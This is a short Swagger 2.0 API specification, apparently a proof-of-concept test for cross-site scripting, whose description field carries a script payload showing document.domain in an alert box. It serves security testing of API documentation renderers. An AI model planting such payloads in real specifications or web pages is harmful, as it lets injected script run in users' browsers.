swagger: "2.0"
info:
  title: "XSS Test"
  description: "<script>alert(document.domain)</script>"
paths:
  /test:
    get:
      summary: "XSS PoC"
      responses:
        200:
          description: "successful operation"
